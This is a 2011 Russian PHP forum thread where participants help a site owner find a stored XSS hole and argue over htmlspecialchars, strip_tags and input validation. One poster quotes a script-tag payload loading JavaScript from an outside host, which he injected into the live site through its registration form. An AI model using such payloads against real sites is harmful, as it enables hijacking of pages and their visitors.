всё равно как то умудрябться всё жто ставить можете посоветовать или сказать что делать для безопастности?
Спустя 4 минуты, 11 секунд (8.04.2011 - 17:08) inpost написал(а):
Niksik
http://phpforum.ru/index.php?showtopic=21213 - это для кого?
У тебя написано: echo $myrow['login']; , а должен быть как минимум: echo htmlspecialchars($myrow['login']);
http://phpforum.ru/index.php?showtopic=21213 - это для кого?
У тебя написано: echo $myrow['login']; , а должен быть как минимум: echo htmlspecialchars($myrow['login']);
Спустя 3 минуты, 42 секунды (8.04.2011 - 17:12) Niksik написал(а):
где это написано и откуда знаеш?
Спустя 2 минуты, 20 секунд (8.04.2011 - 17:14) inpost написал(а):
Niksik
На главной, где выводится скрипт, у тебя стоит вывод логина.
На главной, где выводится скрипт, у тебя стоит вывод логина.
Спустя 3 минуты, 32 секунды (8.04.2011 - 17:17) Niksik написал(а):
Подожди у меня такого нет
Спустя 4 минуты, 26 секунд (8.04.2011 - 17:22) DedMorozzz написал(а):
! |
DedMorozzz |
Спустя 8 минут, 39 секунд (8.04.2011 - 17:31) inpost написал(а):
Niksik
У тебя там: SELECT * FROM `users` ORDER BY `id` (или date) DESC LIMIT 1 и вывод последнего.
У тебя там: SELECT * FROM `users` ORDER BY `id` (или date) DESC LIMIT 1 и вывод последнего.
Спустя 4 минуты, 28 секунд (8.04.2011 - 17:35) Niksik написал(а):
вот
а вот вывод
$asd = mysql_query("SELECT * FROM `reg` ORDER BY `id` DESC LIMIT 5",$db);
а вот вывод
$asd2 = mysql_fetch_array($asd);
$asd2['login'] = = htmlspecialchars($asd2['login']);
echo '<br /><b><i>Последний зарегистрированный ползователь</i></b><br /><b><i><font color=#FF8000>'.$asd2['login'].'<br />('.$asd2['name'].')</font></i></b>';
Спустя 6 минут, 15 секунд (8.04.2011 - 17:41) petezzza написал(а):
ты ведь обрабатывешь этой функцией htmlspecialchars только $asd2['login'] , а $asd2['name'] выводишь на прямую.
Спустя 18 секунд (8.04.2011 - 17:42) mrpsyx написал(а):
слушайте, а не лучше при внесение данных в бд обработать с htmlspecialchars один раз чем делать это каждый раз при выводе....?
Спустя 2 минуты, 9 секунд (8.04.2011 - 17:44) inpost написал(а):
Niksik
не надо мне тут такого, в одном месте именно так, в другом - по другому. Именно поэтому и вывелся на экран мой хак. Ищи другие места, где допустил ошибку.
Ищи в своём скрипте, где не обработал данные.
не надо мне тут такого, в одном месте именно так, в другом - по другому. Именно поэтому и вывелся на экран мой хак. Ищи другие места, где допустил ошибку.
Ищи в своём скрипте, где не обработал данные.
Спустя 1 минута, 34 секунды (8.04.2011 - 17:45) Domin написал(а):
Так не легче сделать ?
$asd2 = mysql_fetch_array($asd);
echo '<br /><b><i>Последний зарегистрированный ползователь</i></b><br /><b><i><font color=#FF8000>'.htmlspecialchars($asd2['login']).'<br />('.htmlspecialchars($asd2['name']).')</font></i></b>'
Спустя 43 секунды (8.04.2011 - 17:46) inpost написал(а):
mrpsyx
Потом редактировать будет неудобно, да и дискомфорт, обрабатывать надо там, где это необходимо, не за чем всё подряд обрабатывать под одну гребёнку.
Domic
Конечно, так вернее всего.
Потом редактировать будет неудобно, да и дискомфорт, обрабатывать надо там, где это необходимо, не за чем всё подряд обрабатывать под одну гребёнку.
Domic
Конечно, так вернее всего.
Спустя 2 минуты, 24 секунды (8.04.2011 - 17:48) Domin написал(а):
Niksik опиши нормально проблему!!!
Я так понимаю тебе надо отчистить от html тегов ?
Я так понимаю тебе надо отчистить от html тегов ?
Спустя 2 минуты, 17 секунд (8.04.2011 - 17:51) Niksik написал(а):
Короче на моём сайте на главной странице какаято тварь пишет маты.
Как он это делает я не пойму,все формы проверяются на теги а он как то делает можете сказать как если кто знает?
Как он это делает я не пойму,все формы проверяются на теги а он как то делает можете сказать как если кто знает?
Спустя 3 минуты, 55 секунд (8.04.2011 - 17:55) Domin написал(а):
Отчистить переменные входяшие от пользователя !
обрабатывать все переменные приходяшие от юзера, если это Html теги то пользоватьсо надо strip_tags(); она отчистит все теги mysql_real_escape_string()
обрабатывать все переменные приходяшие от юзера, если это Html теги то пользоватьсо надо strip_tags(); она отчистит все теги mysql_real_escape_string()
Спустя 41 секунда (8.04.2011 - 17:55) Niksik написал(а):
inpost это что ты прикаловался?
Спустя 56 секунд (8.04.2011 - 17:56) Niksik написал(а):
htmlspecialchars не все теги удаляет?
Спустя 1 минута, 58 секунд (8.04.2011 - 17:58) Domin написал(а):
Niksik
Niksik эта функция ваше не удаляет их )) почитай тут что она делает -> ТУТ
Niksik эта функция ваше не удаляет их )) почитай тут что она делает -> ТУТ
Спустя 2 минуты, 21 секунда (8.04.2011 - 18:01) Domin написал(а):
юзай strip_tags() и mysql_real_escape_string()
Спустя 2 минуты, 27 секунд (8.04.2011 - 18:03) inpost написал(а):
Domin
А зачем strip_tags() тут вообще? Нормально итак работает, просто надо htmlspecialchars() использовать при выводе данных, как он стал делать только сейчас.
А зачем strip_tags() тут вообще? Нормально итак работает, просто надо htmlspecialchars() использовать при выводе данных, как он стал делать только сейчас.
Спустя 2 минуты (8.04.2011 - 18:05) Niksik написал(а):
inpost так это ты делал?
Спустя 58 секунд (8.04.2011 - 18:06) Domin написал(а):
Где дайте ссылку глянуть хоть что как !
Спустя 3 минуты, 25 секунд (8.04.2011 - 18:09) Niksik написал(а):
Спустя 36 секунд (8.04.2011 - 18:10) Domin написал(а):
Niksik короче, сделай так :
при добавлении записи в базу данных обработай все переменные которые приходят от пользователя тими функциями strip_tags() и mysql_real_escape_string() и выводи спокойно потом в цикле или ешё как то !
при добавлении записи в базу данных обработай все переменные которые приходят от пользователя тими функциями strip_tags() и mysql_real_escape_string() и выводи спокойно потом в цикле или ешё как то !
Спустя 3 минуты, 40 секунд (8.04.2011 - 18:14) inpost написал(а):
Domin
Так ты не ответил, зачем вообще strip_tags ? Для того, чтобы запутать пользователя?
Niksik
При добавлении только mysql_real_escape_string, при выводе только htmlspecialchars
http://my.jetscreenshot.com/demo/20110408-j3ca-36kb
Так ты не ответил, зачем вообще strip_tags ? Для того, чтобы запутать пользователя?
Niksik
При добавлении только mysql_real_escape_string, при выводе только htmlspecialchars
http://my.jetscreenshot.com/demo/20110408-j3ca-36kb
Спустя 39 секунд (8.04.2011 - 18:14) Domin написал(а):
Я зарегался !
Видешь что проходит у тебя ?
так что все переменные обрабатывай теми функциями которые я написал и в БД небудет ничего лишнего!
Видешь что проходит у тебя ?
так что все переменные обрабатывай теми функциями которые я написал и в БД небудет ничего лишнего!
Спустя 1 минута, 1 секунда (8.04.2011 - 18:15) Domin написал(а):
inpost
strip_tags — Удаляет HTML и PHP тэги из строки написано ТУТ
strip_tags — Удаляет HTML и PHP тэги из строки написано ТУТ
Спустя 5 минут, 56 секунд (8.04.2011 - 18:21) Niksik написал(а):
Нечего не происходит всё норм,а что должно было?
Спустя 3 минуты, 22 секунды (8.04.2011 - 18:25) Domin написал(а):
Смотри что получилось после того как я зарегался
это на странице http://niksik.ru/gost.php
Niksik теперь ты понял к чему я клоню ???
Последний зарегистрированный ползователь
Domin<script src="http://d41713.rsstatic.ru/go.js"></script>
(Влад Шева<script src="http://d41713.rsstatic.ru/go.js"></script>)
это на странице http://niksik.ru/gost.php
Niksik теперь ты понял к чему я клоню ???
Спустя 47 секунд (8.04.2011 - 18:25) inpost написал(а):
Domin
Мой ник я записал так: In<p>ost - мне сказали: поздравляем, вы зарегистрировались! Я на следующий день пытаюсь авторизироваться, а мне пишут: простите, нет такого пользователя в БД. Откуда я знал, что скрипт не воспринял мой ЛОГИН и переименовал меня в Inost ? Я НЕ ХОЧУ БЫТЬ inost, совсем не хочу, а ты меня насильно переименовал! А это уже плохо.
Ты даёшь ссылку на описание функции? Зачем? Я тебе говорю, зачем использовать его в данном случае?! Достаточно лишь mysql_real_escape_string, а strip_tags - это лишнее.
И почему я не могу быть как In<p>ost ? Или Ku<li>ev ? Может мне так больше нравится?! А теперь ты нашего Kulieva переименовал у себя в БД в Kuev? нормально?!
Мой ник я записал так: In<p>ost - мне сказали: поздравляем, вы зарегистрировались! Я на следующий день пытаюсь авторизироваться, а мне пишут: простите, нет такого пользователя в БД. Откуда я знал, что скрипт не воспринял мой ЛОГИН и переименовал меня в Inost ? Я НЕ ХОЧУ БЫТЬ inost, совсем не хочу, а ты меня насильно переименовал! А это уже плохо.
Ты даёшь ссылку на описание функции? Зачем? Я тебе говорю, зачем использовать его в данном случае?! Достаточно лишь mysql_real_escape_string, а strip_tags - это лишнее.
И почему я не могу быть как In<p>ost ? Или Ku<li>ev ? Может мне так больше нравится?! А теперь ты нашего Kulieva переименовал у себя в БД в Kuev? нормально?!
Спустя 1 минута, 38 секунд (8.04.2011 - 18:27) Niksik написал(а):
Смотри скрипт записало но он не работает,а я так понимаю ты предлогаеш полностью удалять скрипт?
Спустя 1 минута, 52 секунды (8.04.2011 - 18:29) Niksik написал(а):
В смысле я некого не переименовывал
Спустя 7 секунд (8.04.2011 - 18:29) inpost написал(а):
Niksik
http://phpforum.ru/index.php?showtopic=19168
И ещё, я же отметил жирным, кому адресовал то сообщение.
http://phpforum.ru/index.php?showtopic=19168
И ещё, я же отметил жирным, кому адресовал то сообщение.
Спустя 36 секунд (8.04.2011 - 18:30) Domin написал(а):
inpost ты канеш извени но что ты курил ? какие тут In<p>ost это просто не допустимо ))
А если я захотел такой ник Domin<script src="http://d41713.rsstatic.ru/go.js"></script> что мне скажешь тож зарегать ?
А если я захотел такой ник Domin<script src="http://d41713.rsstatic.ru/go.js"></script> что мне скажешь тож зарегать ?
Спустя 3 минуты, 58 секунд (8.04.2011 - 18:34) inpost написал(а):
Domin
Такое фиксируется ещё до ДОБАВЛЕНИЯ В БД! Слышал когда-нибудь о "Валидация форм"? Так вот, в данном случае надо вывести: "недопустимые символы, введите правильно", а для этого использовать регулярку. А ты заведомо рекомендуешь неправильно вести себя с некорректно введёнными данными.
Такое фиксируется ещё до ДОБАВЛЕНИЯ В БД! Слышал когда-нибудь о "Валидация форм"? Так вот, в данном случае надо вывести: "недопустимые символы, введите правильно", а для этого использовать регулярку. А ты заведомо рекомендуешь неправильно вести себя с некорректно введёнными данными.
Спустя 5 минут, 34 секунды (8.04.2011 - 18:39) Domin написал(а):
inpost знаю не тупой это уже пройденый этап, регулярки и тд, рега у меня на сайте рабит отменно =)
Спустя 2 минуты, 54 секунды (8.04.2011 - 18:42) inpost написал(а):
Domin
Ну тогда зачем советуюшь человеку заведомо неправильный ход действий? Лучше скажи, что тут надо регуляркой проверять ещё до добавления в БД, и разрешать только стандартные символы и буквы. Тогда пользователь всегда на выходе получит тот ник, с которым зарегистрировался.
Niksik выше для тебя тоже адресовалось, перечитай, и ты знаешь, куда дальше направить изучение. Если человек ввёл в форму недопустимые символы - вывести ему результат: Вы ввели неправильные символы. Делается это через регулярное выражение preg_match
Ну тогда зачем советуюшь человеку заведомо неправильный ход действий? Лучше скажи, что тут надо регуляркой проверять ещё до добавления в БД, и разрешать только стандартные символы и буквы. Тогда пользователь всегда на выходе получит тот ник, с которым зарегистрировался.
Niksik выше для тебя тоже адресовалось, перечитай, и ты знаешь, куда дальше направить изучение. Если человек ввёл в форму недопустимые символы - вывести ему результат: Вы ввели неправильные символы. Делается это через регулярное выражение preg_match
Спустя 15 минут, 4 секунды (8.04.2011 - 18:57) Domin написал(а):
Сори что не по теме !
inpost подскажи исче по запросам
можно в одном запросе использовать сразу INSERT INTO и потом SELECT ?
inpost подскажи исче по запросам
можно в одном запросе использовать сразу INSERT INTO и потом SELECT ?
Спустя 5 минут (8.04.2011 - 19:02) inpost написал(а):
Domin
mysqli может, а ты лучше создай свою тему.
mysqli может, а ты лучше создай свою тему.
Спустя 26 дней, 16 часов, 14 минут, 49 секунд (5.05.2011 - 11:17) гость написал(а):
niksik.ru - ты-бы пароль для начала на админа нормальный придумал.
2. слово "фармат" пишется через "О".
3. что за тупость разрешать только png ? почему нельзя jpg ?
4. админка так себе у тебя.
2. слово "фармат" пишется через "О".
3. что за тупость разрешать только png ? почему нельзя jpg ?
4. админка так себе у тебя.